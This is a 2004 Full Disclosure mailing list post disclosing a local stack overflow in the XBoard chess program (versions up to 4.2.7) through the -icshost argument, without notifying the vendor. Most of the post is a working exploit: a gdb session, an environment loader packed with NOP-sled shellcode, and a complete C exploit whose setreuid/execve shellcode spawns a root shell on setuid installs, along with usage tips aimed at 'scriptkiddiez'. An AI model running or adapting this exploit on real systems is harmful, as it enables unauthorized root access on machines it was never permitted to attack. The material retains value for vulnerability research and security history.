Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

Smashing "XBoard 4.2.7(All versions)" For Fun & Profit.*Unpublish ed Local Stack Overflow Vulnerablity!
From: "narko tix" <narkotix () linuxmail org>
Date: Tue, 02 Mar 2004 07:18:03 +0800

/**
**        ! XBoard 4.2.7 UNPUBLISHED VULNERABLITY , 0hDAY !
*
* C0d3r:  N4rK07IX     narkotix () linuxmail org
* Applicati0n :  XBoard !stable! Game 0f Chess- For Unix systemZ <= 4.2.7 (All versions)
* Date :    BUG was discovered in 29.02.2004  @ 00:15  exploited in 29.02.2004  @ 00:25
* Th3 Bug : when u w4nn4 play with other users on_line ,u must type "-ics" and "-icshost" arguments 
*           together(man xboard) .The BUG is in the strcpy() , which the user type the "hostname" after the -icshost 
            argument more than the buffer can h4ndle. Bug is discovered by me.
* Vendor :  http://www.tim-mann.org/xboard.html  , also the author of thiz chess g4me.
* Vendor informed? : N3v3r !
* Patch : I hope Tim will upgrade thiz game to the 4.2.8 (more practice on buffering)
* Risk : D0 n0t afraid there is n0 risk , if xboard is SUID, may some hurt.
* Tested 0n : Slackware Linux 9.0/9.1 , Mandrake Linux 9.x, Redhat 8.0, with xboard 3.6.2 and 4.2.x (all versions)

narkotix () labs:~/c-hell$ /usr/X11R6/bin/xboard -ics -icshost `perl -e 'print "A"x456'`
xboard: Could not connect to host AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA, port 5000: No such file or directory
Segmentation fault
from there on overwriting The EIP is too easy , just tried a few times..
narkotix () labs:~/c-hell$
narkotix () labs:~/c-hell$ ./xboard_env  <----- putting sh3llc0de to th3 environment ... i'll give it.
narkotix () labs:~/c-hell$ gdb /usr/X11R6/bin/xboard 
...
.......
(gdb) x/s
0xbffffcb6:      "XBOARD=", '\220' <repeats 195 times>...
(gdb) x/s
0xbffffd7e:      '\220' <repeats 200 times>...    <-----------Thiz iz the address of our env w3 n33d.
(gdb) x/s
ok lets convert it to char string.. ------> \x7e\xfd\xff\bf    yeah all done.
quit
narkotix () labs:~/c-hell$  /usr/X11R6/bin/xboard -ics -icshost `perl -e 'print "\x7e\xfd\xff\xbf"x166'`
sh-2.05b# id
uid=0(root) gid=100(users) groups=100(users)         <-----on my box all of the programs r SUID :P just demonstrated.
sh-2.05b# 
Gr33tingz: EFnet,mathmonkey,laplace_ex,blackhat community,deathmann,Islam Nation,kusev(civil engineer)
Sh0utZ:    collusion,xmlguy,0xbf(fuck u bitch),and u bigmutant r u still alive ? passed your CCNP exam?
L4stW0rdZ: mathmonkey sirada bekleyen daha bir suru vuln program var, ama bir an once projeyi bitirecegimize soz 
veriyorum.
           bu arada SunOS CD lerimi bir an once ISO larsan ben de sevinirim :P. Mucx seni seviyorum bunu Unutma...
           U r as Intellig3nt as your f4th3r was :P ..love from I.T.U
**/

 //Here is th3 h4x0r version of xboard_env.c Use thiz to set the env, and U do not need 
 //extra code for exploitation.GDB rulezz.
 /****************************************CUT HERE*******************

#include <stdio.h>
#include <stdlib.h>

char shellcode[] =
        "\x31\xc0\x31\xdb\xb0\x17\xcd\x80" // shellcode by zillion
        "\xeb\x5a\x5e\x31\xc0\x88\x46\x07\x31\xc0\x31\xdb\xb0\x27\xcd"
        "\x80\x85\xc0\x78\x32\x31\xc0\x31\xdb\x66\xb8\x10\x01\xcd\x80"
        "\x85\xc0\x75\x0f\x31\xc0\x31\xdb\x50\x8d\x5e\x05\x53\x56\xb0"
        "\x3b\x50\xcd\x80\x31\xc0\x8d\x1e\x89\x5e\x08\x89\x46\x0c\x50"
        "\x8d\x4e\x08\x51\x56\xb0\x3b\x50\xcd\x80\x31\xc0\x8d\x1e\x89"
        "\x5e\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
        "\xcd\x80\xe8\xa1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";

int main()
{
  char xboard[600];
  printf("XBOARD environment loader\n");
  printf("=> narkotix () linuxmail org\n");

  memset(xboard,0x90,600);
  memcpy(&xboard[600-strlen(shellcode)],shellcode,strlen(shellcode));
  memcpy(xboard,"XBOARD=",7);
  putenv(xboard);
  
  execl("/bin/bash","bash",'\0');
  
return(0); 
} 
********************************************CUT HERE*******/
//Hey scriptkiddiez d0 U think i forget U ?. 0fcoure N0t.But before using this C0de U must set the DISPLAY,and also 
sysadmin
//must xhost + 'ed localhost . otherwise u will get some errorz like " Error: Can't open display: "..   njoy your life.
#include <stdio.h>
#include <string.h>
#include <unistd.h>

#define BUFFERSIZE 448   // <----- Play with it,depending on your box. Tested on Slackware 9.0

static char hell_code[] =

        //* setreuid(0,0);
        "\x31\xc0"                      // xor    %eax,%eax
        "\x31\xdb"                      // xor    %ebx,%ebx
        "\x31\xc9"                      // xor    %ecx,%ecx
        "\xb0\x46"                      // mov    $0x46,%al
        "\xcd\x80"                      // int    $0x80

        /* setgid(0); */
        "\x31\xdb"                      // xor %ebx,%ebx
        "\x89\xd8"                      // mov %ebx,%eax
        "\xb0\x2e"                      // mov $0x2e,%al
        "\xcd\x80"                      // int $0x80

        // execve /bin/sh
        "\x31\xc0"                      // xor    %eax,%eax
        "\x50"                          // push   %eax
        "\x68\x2f\x2f\x73\x68"          // push   $0x68732f2f
        "\x68\x2f\x62\x69\x6e"          // push   $0x6e69622f
        "\x89\xe3"                      // mov    %esp,%ebx
        "\x8d\x54\x24\x08"              // lea    0x8(%esp,1),%edx
        "\x50"                          // push   %eax
        "\x53"                          // push   %ebx
        "\x8d\x0c\x24"                  // lea    (%esp,1),%ecx
        "\xb0\x0b"                      // mov    $0xb,%al
        "\xcd\x80"                      // int    $0x80

        // exit();
        "\x31\xc0"                      // xor    %eax,%eax
        "\xb0\x01"                      // mov    $0x1,%al
        "\xcd\x80";                     // int    $0x80


main(void)
    
{
        printf("************************************************\n");            
        printf("xboard <= 4.2.7 local xploit written by N4rK07IX\n");
        printf("=> narkotix () linuxmail org\n");
        char *env[2] = {hell_code,NULL};
        char buffer[BUFFERSIZE];
        int i;
        int *adrpointer = (int *)(buffer );
        
        int ret_addr = 0xbffffffa - strlen(hell_code) - strlen("/usr/X11R6/bin/xboard");
        
        for (i = 0; i < BUFFERSIZE-1 ; i += 4)
        
                *adrpointer++ = ret_addr;

        execle("/usr/X11R6/bin/xboard", "xboard","-ics","-icshost",NULL,buffer,env);
        if(!execle)
        perror("execle()");
        return(0);
}

//S3curity Is not Th3 D3f4ult


-- 
______________________________________________
Check out the latest SMS services @ http://www.linuxmail.org 
This allows you to send and receive SMS through your mailbox.


Powered by Outblaze

Attachment: xboard.c
Description:


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault